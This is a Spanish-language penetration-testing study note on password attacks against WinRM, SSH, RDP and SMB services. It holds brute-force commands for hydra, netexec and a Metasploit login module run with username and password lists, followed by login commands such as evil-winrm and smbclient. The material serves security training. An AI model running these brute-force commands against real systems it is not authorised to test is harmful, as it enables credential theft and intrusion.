Ataques de Contraseñas y Servicios de Autenticación

Durante pruebas de penetración, los equipos suelen tener servicios para gestionar o crear contenido. Algunos comunes son:

Todos estos servicios requieren autenticación (usuario + contraseña) y algunos permiten llaves en vez de contraseñas.


🖥️ Acceso remoto a Windows

Para gestionar un Windows Server:

  1. RDP – Escritorio remoto visual (puerto TCP 3389) 🖱️💻

  2. WinRM – PowerShell remoto vía SOAP/XML (puertos 5985/5986) ⚡

  3. SSH – Más común en Linux, pero posible en Windows 🔑


🔧 WinRM

EjemploS

netexec winrm <IP> -u username.list -p password.list

Cuando aparezca pWn3d! es que se ha encontrado el usuario
Pasted image 20250821184312.png

evil-winrm -i <IP> -u <usuario> -p <contraseña>

Pasted image 20250821184849.png


🔐 SSH

Ataques de fuerza bruta con Hydra:

hydra -L username.list -P password.list ssh://<IP> 

Pasted image 20250821184559.png

Conexión SSH:

ssh <usuariio>@<IP>

Pasted image 20250821185305.png


🖥️ RDP (Remote Desktop Protocol)

Fuerza bruta con Hydra:

hydra -L username.list -P password.list rdp://<ip>

Fuerza bruta con Netexec:

netexec rdp <IP> -u username.list -p password.list

Conectarse por RDP

xfreerdp /v:<IP> /u:<usuario> /p:<contraseña>

📂 Samba

Fuerza bruta con Hydra:

hydra -L username.list -P password.list smb://<IP>

Fuerza bruta con Netexec:

netexec smb 10.129.123.210 -u username.list -p password.list

Fuerza bruta con Metaexploit:

msfconsole -q 
use auxiliary/scanner/smb/smb_login 
set user_file username.list 
set pass_file password.list
set RHOSTS <IP>
run

{AF999D93-3143-4145-A595-30DFBC99E467}.png
conectrase por samba

smbclient //<IP>/<recurso> -U <usuario